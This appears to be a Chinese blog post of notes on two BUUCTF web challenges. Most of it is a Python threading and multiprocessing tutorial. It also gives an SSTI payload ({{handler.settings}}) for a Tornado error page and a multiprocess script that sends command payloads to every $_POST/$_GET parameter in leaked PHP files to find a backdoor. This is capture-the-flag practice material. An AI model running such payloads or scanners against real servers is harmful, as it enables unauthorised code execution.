BUUctf[1]

easy_tornado

tornado:轻量级web框架,拥有异步非阻塞的io处理方式

主要用于高并发场景的处理,与django对比,django注重的是快速开发,orm,后台管理,session处理,而tornado的特点为HTTP服务器,异步编程,websocket

import tornado.web
import tornado.ioloop
import tornado.httpserver


# 一个业务处理类

class IndexHandler(tornado.web.RequestHandler):
    """Handler for the root route: answers every GET with a plain "hi"."""

    def get(self, *args, **kwargs):
        # Same fixed response regardless of arguments.
        body = "hi"
        self.write(body)


if __name__ == '__main__':
    # Application object: route table mapping "/" to IndexHandler.
    app = tornado.web.Application([
        (r"/", IndexHandler)
    ])
    # Simple single-process alternative (server not running yet here):
    # app.listen(8000)
    # Explicit HTTP server wrapping the application.
    http_server = tornado.httpserver.HTTPServer(app)
    # Single-process start:
    # http_server.listen(8000)
    # Bind the port, then fork 2 worker processes.
    # NOTE: start(n > 1) reportedly does not work on Windows.
    http_server.bind(8000)
    http_server.start(2)
    # Enter the event loop; the server begins serving requests here.
    tornado.ioloop.IOLoop.current().start()

tornado会把客户端请求到的socket连接交给epoll去管理


当然这题和这些都没关系,就一个ssti

https://xz.aliyun.com/t/2908

error页面输入{{handler.settings}}就行

高明的黑客

python编程练习

threading多线程

threading.active_count() 线程数

threading.enumerate() 枚举所有线程

threading.current_thread() 当前线程


添加线程

added_thread=threading.Thread(target=thread_job) 其中target指向thread_job(这个线程要做的工作)

定义job

def thread_job(): print("This is an added thread, number is %s" % threading.current_thread())

告诉线程什么时候开始

added_thread.start()

join

多线程是同时开始的任务,如果你想等待某些线程都结束之后再做某件事,那你就会用到join

added_thread.join() 表示这行语句后面的语句要等待added_thread运行完以后才能运行

queue给线程传输数据

因为线程不能使用return传值回来,于是使用队列来传值

import threading
import time
from queue import Queue


def job(l, q):
    """Square every element of `l` in place, then push the list onto `q`."""
    for idx, val in enumerate(l):
        l[idx] = val ** 2
    q.put(l)

def multithreading():
    """Square four lists in four parallel threads and print the results.

    Threads cannot `return` a value, so each worker reports its result
    through the shared queue instead.
    """
    q = Queue()
    data = [[1, 2, 3], [2, 3, 4], [5, 5, 5], [6, 6, 1]]
    workers = []
    for chunk in data:
        t = threading.Thread(target=job, args=(chunk, q))
        t.start()
        workers.append(t)
    # Wait for every worker before draining the queue.
    for t in workers:
        t.join()
    results = [q.get() for _ in range(len(data))]
    print(results)

if __name__ == "__main__":
    # Entry point: run the queue-based multithreading demo.
    multithreading()

同步和异步针对应用程序来,关注的是程序中间的协作关系;阻塞与非阻塞更关注的是单个进程的执行状态。

python threading的问题

python有GIL,实际上使用多线程只能节省掉I/O操作的时间

🔒lock

import threading


def job1():
    """Add 1 to the shared counter A ten times while holding the global lock."""
    global A, lock
    with lock:
        for _ in range(10):
            A += 1
            print("job1", A)

def job2():
    """Add 10 to the shared counter A ten times while holding the global lock."""
    global A, lock
    with lock:
        for _ in range(10):
            A += 10
            print('job2', A)


if __name__ == "__main__":
    # Shared state mutated by both jobs; the lock serialises their updates.
    A = 0
    lock = threading.Lock()
    workers = [threading.Thread(target=job1), threading.Thread(target=job2)]
    for t in workers:
        t.start()
    for t in workers:
        t.join()

multiprocessing多进程

与多线程很相似

import multiprocessing as mp
import threading as td


def job(a, d):
    """Toy task: just prove that the worker ran."""
    print('aaa')


# Threads and processes are created with the exact same call shape.
t1 = td.Thread(target=job, args=(1, 2))
p1 = mp.Process(target=job, args=(1, 2))
import multiprocessing as mp


def job(q):
    """Compute sum(i + i**2 + i**3) for i in [0, 1000) and queue the result.

    A queue is used because a process target cannot return a value to
    the parent.
    """
    q.put(sum(i + i ** 2 + i ** 3 for i in range(1000)))


if __name__ == "__main__":
    q = mp.Queue()
    workers = [mp.Process(target=job, args=(q,)) for _ in range(2)]
    for p in workers:
        p.start()
    for p in workers:
        p.join()
    # One queued result per process; print their sum.
    res1 = q.get()
    res2 = q.get()
    print(res1 + res2)

pool

import multiprocessing as mp


def job(x):
    """Return the square of x."""
    return x * x

def multicore():
    """Demonstrate Pool.map, a single apply_async, and a batch of them."""
    pool = mp.Pool(processes=4)
    # map blocks until every result is ready, preserving input order.
    mapped = pool.map(job, range(1000000))
    print(mapped)
    # apply_async returns a handle; .get() waits for that one result.
    handle = pool.apply_async(job, (2,))
    print(handle.get())
    handles = [pool.apply_async(job, (i,)) for i in range(10)]
    print([h.get() for h in handles])

if __name__ == "__main__":
    # Entry point: run the process-pool demo.
    multicore()

共享内存

要指定变量的类型

import multiprocessing as mp

# Shared-memory scalar: type code 'i' is a C int, initial value 1.
value=mp.Value('i',1)
# Shared-memory array of C ints; only one-dimensional lists are accepted.
array=mp.Array('i',[1,2,4])

lock

和多线程类似

import multiprocessing as mp
import time


def job(v, num, l):
    """Add `num` to the shared value `v` ten times while holding lock `l`.

    The lock serialises the two competing processes so their increments
    do not interleave.
    """
    with l:
        for _ in range(10):
            time.sleep(0.1)
            v.value += num
            print(v.value)


def multicore():
    """Race two processes over one shared int, protected by a single lock."""
    l = mp.Lock()
    v = mp.Value('i', 0)
    workers = [
        mp.Process(target=job, args=(v, 1, l,)),
        mp.Process(target=job, args=(v, 3, l,)),
    ]
    for p in workers:
        p.start()
    for p in workers:
        p.join()


if __name__ == "__main__":
    # Entry point: run the shared-Value + Lock demo.
    multicore()

本题脚本

import requests
import os
import re
import multiprocessing as mp


def job(file):
    """Probe one leaked source file for an eval-able $_POST/$_GET parameter.

    Sends `echo "fucking yeah"` as each candidate parameter's value; if the
    marker appears in the response, that parameter is executed server-side.
    Returns the (file, parameter) pair on a hit, None otherwise.
    """
    print("try " + file)
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"}
    root = r"C:\Users\23981\Desktop\tmp\buu1\src"
    url = r"http://web15.buuoj.cn/"
    # Read the whole file up front and close the handle before the slow
    # network loop starts.
    with open(root + '\\' + file) as f:
        text = f.read()
    # Non-greedy .*? so several parameters on one source line are matched
    # separately instead of being merged into one greedy match.
    for param in re.findall(r"\$_POST\['.*?']", text):
        name = param[8:-2]  # strip leading $_POST[' and trailing ']
        resp = requests.post(url=url + file, data={name: 'echo "fucking yeah"'}, headers=headers)
        print(resp.content.decode('utf-8'))
        if "fucking yeah" in resp.text:
            print(file, param)
            # The original called pool.close()/exit(0) here, but `pool` only
            # exists in the parent process (NameError in a spawned worker);
            # returning the hit is both safe and informative.
            return file, param
    for param in re.findall(r"\$_GET\['.*?']", text):
        name = param[7:-2]  # strip leading $_GET[' and trailing ']
        # Use a real GET request so the payload lands in $_GET (the original
        # sent a POST with URL params, which also works but is misleading).
        resp = requests.get(url=url + file, params={name: 'echo "fucking yeah"'}, headers=headers)
        print(resp.content.decode('utf-8'))
        if "fucking yeah" in resp.text:
            print(file, param)
            return file, param
    return None


if __name__ == '__main__':
    root = r"C:\Users\23981\Desktop\tmp\buu1\src"
    # Files directly under `root`: os.walk's first yield is (root, dirs,
    # files).  The original loop kept whichever directory os.walk yielded
    # LAST, which is only correct when `root` has no subdirectories.
    file_list = next(os.walk(root))[2]
    pool = mp.Pool(processes=20)
    try:
        pool.map(job, file_list)
    finally:
        # close() must precede join(): calling join() on a running pool
        # raises ValueError.
        pool.close()
        pool.join()

脚本要跑很久,而且被WAF ban了????啥情况,明天我再看看

疯狂被waf墙,想不到解决办法,先水一篇博客

发表评论

电子邮件地址不会被公开。 必填项已用*标注